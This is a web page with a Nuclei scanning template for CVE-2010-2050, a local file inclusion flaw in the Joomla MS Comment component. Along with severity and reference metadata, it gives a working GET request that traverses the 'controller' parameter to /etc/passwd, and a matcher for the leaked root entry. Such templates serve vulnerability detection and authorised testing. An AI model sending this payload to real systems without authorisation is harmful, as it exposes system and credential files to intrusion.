Skip to content

Joomla! Component MS Comment 0.8.0b - Local File Inclusion

ID: CVE-2010-2050

Severity: high

Author: daffainfo

Tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n

A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/12611
- https://nvd.nist.gov/vuln/detail/CVE-2010-2050
- http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
- http://www.vupen.com/english/advisories/2010/1159
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58619
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-2050
cwe-id: CWE-22
epss-score: 0.03527
epss-percentile: 0.91571
cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
metadata:
max-request: 1
vendor: m0r0n
product: com_mscomment
tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502210092b2de59b7c71fe69b3fccbcdc3945a2f14f69ace05c8aa7239be58076ba1b0a02200b73d53a18a43e1823e2aa80f2045e5b69486ee8d5a5a45ffbe34ed8a0adf594:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-2050.yaml"

View on Github